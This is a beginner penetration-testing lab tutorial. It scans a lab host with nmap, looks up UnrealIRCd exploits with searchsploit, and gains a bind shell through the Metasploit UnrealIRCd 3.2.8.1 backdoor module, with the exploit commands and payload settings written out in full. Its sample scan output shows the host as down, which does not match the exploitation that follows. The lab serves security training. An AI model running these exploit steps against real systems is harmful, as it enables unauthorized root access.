Discover Network Service Vulnerabilities

CybersecurityCybersecurityBeginner
Practice Now

Introduction

Network scanning is an extremely hands-on discipline. Through network scanning, users can discover the ports assigned to various services on the target host, open services, service software and versions, and other information.

In this lab, you will learn how to scan network service security vulnerabilities of a target host.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_port_scanning("`Nmap Port Scanning Methods`") subgraph Lab Skills cybersecurity/nmap_port_scanning -.-> lab-416121{{"`Discover Network Service Vulnerabilities`"}} end

Use Nmap to Scan Open Ports on the Target Host

The basic workflow of network scanning is as follows:

  1. Discover the target host
  2. Port scanning
  3. Fingerprint information scanning
  4. Vulnerability scanning
  5. Perform penetration attacks

Nmap (Network Mapper) is a powerful network scanning tool. It supports various scanning techniques, such as UDP, TCP connect(), TCP SYN (half-open scanning), FTP proxy (bounce attack), reverse flag, ICMP, FIN, ACK scanning, SYN scanning, and null scanning.

In this step, you will use Nmap to scan the open ports on the target host.

  1. Open a terminal and enter the Kali container:
docker run -ti --network host b5b709a49cd5 bash
  1. Use the nmap command to scan the target host 192.168.122.102:
nmap -p 1-65535 -T4 -A -v 192.168.122.102 > /tmp/report.txt

This command scans all ports from 1 to 65535 on the target host, with a timing policy of 4 (faster), enables OS fingerprinting and version detection, and saves the output to /tmp/report.txt.

Analyze the Scan Results

After scanning the target host, you need to analyze the scan results to identify potential vulnerabilities.

  1. View the scan report:
cat /tmp/report.txt

This command displays the contents of the /tmp/report.txt file, which contains information about the open ports, services, and versions on the target host, here's an example of the output you might see:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 15:28 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating ARP Ping Scan at 15:28
Scanning 192.168.122.102 [1 port]
Completed ARP Ping Scan at 15:28, 1.42s elapsed (1 total hosts)
Nmap scan report for 192.168.122.102 [host down]
NSE: Script Post-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.98 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)
  1. Use the searchsploit tool to search for vulnerability information:
searchsploit unreal ircd

This command searches the Exploit Database for vulnerabilities related to the "unreal ircd" service, here's an example of the output you might see:

---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                    | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                         | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                  | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                       | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  1. View the details of a vulnerability:
cat /usr/share/exploitdb/exploits/linux/remote/16922.rb

This command displays the contents of the vulnerability exploit file located at /usr/share/exploitdb/exploits/linux/remote/16922.rb.

Exploit a Vulnerability

After analyzing the scan results and identifying potential vulnerabilities, you can attempt to exploit a vulnerability for a penetration attack.

  1. Identify an exploitable vulnerability from the scan results. For example, let's assume the scan found an open port 6667 with a vulnerable service.

  2. Start the Metasploit Framework:

cd ~
msfconsole
  1. In the Metasploit console, select the appropriate exploit module:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Set the target host IP address:
set RHOST 192.168.122.102
  1. Set the payload:
set PAYLOAD cmd/unix/bind_perl
  1. Launch the exploit:
exploit

If the exploitation is successful, you will gain access to the target host.

  1. After attempting to exploit a vulnerability, you should verify whether the exploitation was successful. In the Metasploit session, check the current user and hostname:
whoami
hostname

If the output shows that you are logged in as the root user and the hostname matches the target host, the exploitation was successful.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned the basic workflow of network scanning, which includes discovering the target host, port scanning, fingerprint information scanning, vulnerability scanning, and performing penetration attacks. You used the powerful Nmap tool to scan the open ports on the target host and analyzed the scan results to identify potential vulnerabilities. Additionally, you learned how to search for vulnerability information using the searchsploit tool and how to exploit a vulnerability using the Metasploit Framework. Finally, you verified the success of the exploitation by checking the current user and hostname on the target host.

Through this hands-on lab, you gained practical experience in scanning network service security vulnerabilities and performing penetration attacks. This knowledge is crucial for ensuring the security of network systems and identifying potential risks.

Other Cybersecurity Tutorials you may like